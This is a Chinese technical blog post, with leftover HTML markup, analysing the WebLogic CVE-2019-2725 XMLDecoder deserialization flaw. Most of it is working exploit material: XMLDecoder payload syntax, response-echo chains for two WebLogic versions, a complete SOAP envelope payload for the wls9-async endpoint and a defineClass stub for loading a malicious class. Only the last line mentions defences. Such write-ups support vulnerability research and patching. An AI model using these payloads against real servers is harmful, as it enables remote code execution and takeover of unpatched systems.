WebLogic CVE-2019-2725漏洞分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2019-2725是Oracle WebLogic Server中的一个远程代码执行漏洞，影响10.3.6.0和12.1.3.0版本。该漏洞源于WebLogic的wls9-async组件在反序列化XML数据时存在缺陷，攻击者可以通过发送精心构造的XML请求在目标服务器上执行任意代码。<\/p>

XMLDecoder解析机制<\/h2>

基本语法解析<\/h3>

XMLDecoder是Java中用于将XML数据反序列化为Java对象的工具。理解其语法对构造有效载荷至关重要：<\/p>

对象初始化<\/strong>：<\/li> <\/ol>
<object<\/span> class=<\/span>"java.io.FileWriter"<\/span>><string><\/span>f:\/2.txt<\/string><\/object><\/span> <\/span><\/span>或 <\/span><\/span><void<\/span> class=<\/span>"java.io.FileWriter"<\/span>><string><\/span>f:\/2.txt<\/string><\/void><\/span> <\/span><\/span><\/code><\/pre> 无值链式调用<\/strong>：<\/li> <\/ol> out.<\/span>getClass<\/span>().<\/span>toString<\/span>()<\/span> <\/span><\/span>对应<\/span>XML：<\/span> <\/span><\/span><<\/span>void<\/span> method=<\/span>"getClass"<\/span>><<\/span>void<\/span> method=<\/span>"toString"<\/span> id=<\/span>"className"<\/span>><\/<\/span>void<\/span>><\/<\/span>void<\/span>><\/span> <\/span><\/span><\/code><\/pre> 有值链式调用<\/strong>：<\/li> <\/ol> a.<\/span>getxxx<\/span>(<\/span>"xxx"<\/span>).<\/span>toString<\/span>()<\/span> <\/span><\/span>对应<\/span>XML：<\/span> <\/span><\/span><<\/span>void<\/span> method=<\/span>"getxxx"<\/span>><\/span> <\/span><\/span> <<\/span>string><\/span>xxx<\/<\/span>string><\/span> <\/span><\/span> <<\/span>void<\/span> method=<\/span>"toString"<\/span>><\/<\/span>void<\/span>><\/span> <\/span><\/span><\/<\/span>void<\/span>><\/span> <\/span><\/span><\/code><\/pre> 普通调用<\/strong>：<\/li> <\/ol> <void<\/span> method=<\/span>"write"<\/span>><object<\/span> idref=<\/span>"className"<\/span>><\/object><\/void><\/span> <\/span><\/span><void<\/span> method=<\/span>"close"<\/span>><\/void><\/span> <\/span><\/span><\/code><\/pre> 属性获取<\/strong>：<\/li> <\/ol> <void<\/span> property=<\/span>"class"<\/span> id=<\/span>"class_property"<\/span>><\/void><\/span> <\/span><\/span><\/code><\/pre> ID与IDREF<\/strong>：<\/li> <\/ol> <void<\/span> property=<\/span>"class"<\/span> id=<\/span>"class_property"<\/span>><\/void><\/span> <\/span><\/span><void<\/span> method=<\/span>"write"<\/span>><object<\/span> idref=<\/span>"className"<\/span>><\/object><\/void><\/span> <\/span><\/span><\/code><\/pre>回显构造技术<\/h2> 10.0.3版本回显构造<\/h3> 获取当前线程<\/strong>：<\/li> <\/ol> ((<\/span>ServletRequestImpl)<\/span> this<\/span>.<\/span>getCurrentWork<\/span>()).<\/span>getResponse<\/span>()<\/span> <\/span><\/span><\/code><\/pre> 输出方式<\/strong>：<\/li> <\/ol> \/\/ 使用getWriter <\/span><\/span><\/span><\/span>PrintWriter pw =<\/span> response.<\/span>getWriter<\/span>();<\/span> <\/span><\/span>pw.<\/span>write<\/span>(<\/span>"hello"<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 或使用getOutputStream <\/span><\/span><\/span><\/span>response.<\/span>getOutputStream<\/span>().<\/span>write<\/span>(<\/span>"hello"<\/span>.<\/span>getBytes<\/span>(<\/span>"UTF-8"<\/span>));<\/span> <\/span><\/span><\/code><\/pre> 完整回显代码<\/strong>：<\/li> <\/ol> String lfcmd =<\/span> ((<\/span>weblogic.<\/span>servlet<\/span>.<\/span>internal<\/span>.<\/span>ServletRequestImpl<\/span>)((<\/span>weblogic.<\/span>work<\/span>.<\/span>ExecuteThread<\/span>)<\/span>Thread.<\/span>currentThread<\/span>()).<\/span>getCurrentWork<\/span>()).<\/span>getHeader<\/span>(<\/span>"lfcmd"<\/span>);<\/span> <\/span><\/span>weblogic.<\/span>servlet<\/span>.<\/span>internal<\/span>.<\/span>ServletResponseImpl<\/span> response =<\/span> ((<\/span>weblogic.<\/span>servlet<\/span>.<\/span>internal<\/span>.<\/span>ServletRequestImpl<\/span>)((<\/span>weblogic.<\/span>work<\/span>.<\/span>ExecuteThread<\/span>)<\/span>Thread.<\/span>currentThread<\/span>()).<\/span>getCurrentWork<\/span>()).<\/span>getResponse<\/span>();<\/span> <\/span><\/span>weblogic.<\/span>servlet<\/span>.<\/span>internal<\/span>.<\/span>ServletOutputStreamImpl<\/span> outputStream =<\/span> response.<\/span>getServletOutputStream<\/span>();<\/span> <\/span><\/span>outputStream.<\/span>writeStream<\/span>(<\/span>new<\/span> weblogic.<\/span>xml<\/span>.<\/span>util<\/span>.<\/span>StringInputStream<\/span>(<\/span>lfcmd));<\/span> <\/span><\/span>outputStream.<\/span>flush<\/span>();<\/span> <\/span><\/span>response.<\/span>getWriter<\/span>().<\/span>write<\/span>(<\/span>""<\/span>);<\/span> <\/span><\/span><\/code><\/pre> 对应的XML载荷<\/strong>：<\/li> <\/ol> <void<\/span> class=<\/span>"java.lang.Thread"<\/span> method=<\/span>"currentThread"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getCurrentWork"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getResponse"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getServletOutputStream"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"writeStream"<\/span>><\/span> <\/span><\/span> <object<\/span> class=<\/span>"weblogic.xml.util.StringInputStream"<\/span>><string><\/span>2222222222<\/string><\/object><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <void<\/span> method=<\/span>"flush"<\/span>\/><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getWriter"<\/span>><void<\/span> method=<\/span>"write"<\/span>><string><\/string><\/void><\/void><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span><\/void><\/span> <\/span><\/span><\/code><\/pre>12.1.3版本回显构造<\/h3> 12.1.3版本中获取Response的方式有所不同：<\/p> 使用反射获取connectionHandler<\/strong>：<\/li> <\/ol> java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>Field<\/span> field =<\/span> ((<\/span>weblogic.<\/span>servlet<\/span>.<\/span>provider<\/span>.<\/span>ContainerSupportProviderImpl<\/span>.<\/span>WlsRequestExecutor<\/span>)<\/span>this<\/span>.<\/span>getCurrentWork<\/span>()).<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"connectionHandler"<\/span>);<\/span> <\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>HttpConnectionHandler httpConn =<\/span> (<\/span>HttpConnectionHandler)<\/span> field.<\/span>get<\/span>(<\/span>this<\/span>.<\/span>getCurrentWork<\/span>());<\/span> <\/span><\/span>httpConn.<\/span>getServletRequest<\/span>().<\/span>getResponse<\/span>().<\/span>getServletOutputStream<\/span>().<\/span>writeStream<\/span>(<\/span>new<\/span> weblogic.<\/span>xml<\/span>.<\/span>util<\/span>.<\/span>StringInputStream<\/span>(<\/span>"xxxxxx"<\/span>));<\/span> <\/span><\/span><\/code><\/pre> 完整XML载荷<\/strong>：<\/li> <\/ol> <?xml version="1.0" encoding="utf-8"?><\/span> <\/span><\/span><soapenv:Envelope<\/span> xmlns:soapenv=<\/span>"http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"<\/span>><\/span> <\/span><\/span> <soapenv:Header><\/span> <\/span><\/span> <work:WorkContext<\/span> xmlns:work=<\/span>"http:\/\/bea.com\/2004\/06\/soap\/workarea\/"<\/span>><\/span> <\/span><\/span> <java><\/span> <\/span><\/span> <void<\/span> class=<\/span>"java.lang.Thread"<\/span> method=<\/span>"currentThread"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getCurrentWork"<\/span> id=<\/span>"current_work"<\/span>><\/void><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <\/span><\/span> <void<\/span> class=<\/span>"java.lang.Thread"<\/span> method=<\/span>"currentThread"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getCurrentWork"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getClass"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getDeclaredField"<\/span> id=<\/span>"field"<\/span>><string><\/span>connectionHandler<\/string><\/void><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <\/span><\/span> <object<\/span> idref=<\/span>"field"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"setAccessible"<\/span>><\/span> <\/span><\/span> <boolean><\/span>true<\/boolean><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <void<\/span> method=<\/span>"get"<\/span> id=<\/span>"http_conn"<\/span>><\/span> <\/span><\/span> <object<\/span> idref=<\/span>"current_work"<\/span>><\/object><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <\/object><\/span> <\/span><\/span> <\/span><\/span> <object<\/span> idref=<\/span>"http_conn"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getServletRequest"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getResponse"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getServletOutputStream"<\/span>><\/span> <\/span><\/span> <void<\/span> method=<\/span>"writeStream"<\/span>><\/span> <\/span><\/span> <object<\/span> class=<\/span>"weblogic.xml.util.StringInputStream"<\/span>><string><\/span>33333333333333<\/string><\/object><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <void<\/span> method=<\/span>"flush"<\/span>\/><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <void<\/span> method=<\/span>"getWriter"<\/span>><void<\/span> method=<\/span>"write"<\/span>><string><\/string><\/void><\/void><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <\/void><\/span> <\/span><\/span> <\/object><\/span> <\/span><\/span> <\/java><\/span> <\/span><\/span> <\/work:WorkContext><\/span> <\/span><\/span> <\/soapenv:Header><\/span> <\/span><\/span> <soapenv:Body\/><\/span> <\/span><\/span><\/soapenv:Envelope><\/span> <\/span><\/span><\/code><\/pre>高级利用技术<\/h2> defineClass方法<\/h3> 可以使用defineClass还原恶意class，将类变成模块化组件：<\/p> \/\/ 将恶意类转换为base64编码 <\/span><\/span><\/span><\/span>String evilClassBase64 =<\/span> "..."<\/span>;<\/span> <\/span><\/span>\/\/ 使用defineClass加载 <\/span><\/span><\/span><\/code><\/pre>注意事项<\/h2> 流使用问题：<\/p> getOutputStream是字节流，getWriter是字符流<\/li> 不能在getWriter后面调用getOutputStream<\/li> 但可以先使用getOutputStream，再使用getWriter<\/li> <\/ul> <\/li> 参数获取：<\/p> 可以从header头获取参数：<\/li> <\/ul> ((<\/span>weblogic.<\/span>servlet<\/span>.<\/span>internal<\/span>.<\/span>ServletRequestImpl<\/span>)((<\/span>weblogic.<\/span>work<\/span>.<\/span>ExecuteThread<\/span>)<\/span>Thread.<\/span>currentThread<\/span>()).<\/span>getCurrentWork<\/span>()).<\/span>getHeader<\/span>(<\/span>"lufei"<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 参考资源<\/h2> defineClass在java反序列化当中的利用<\/a><\/li> shack2 CVE-2017-10271反序列化工具<\/a><\/li> GitHub PoC代码<\/a><\/li> <\/ol> 总结<\/h2> 本漏洞利用关键在于：<\/p> 理解XMLDecoder的反序列化机制<\/li> 掌握不同WebLogic版本获取Response的方式<\/li> 正确处理流操作避免冲突<\/li> 灵活使用反射机制绕过限制<\/li> <\/ol> 通过精心构造的XML载荷，攻击者可以在目标WebLogic服务器上实现远程代码执行，获取系统控制权。防御措施包括及时安装官方补丁、禁用wls9-async组件等。<\/p>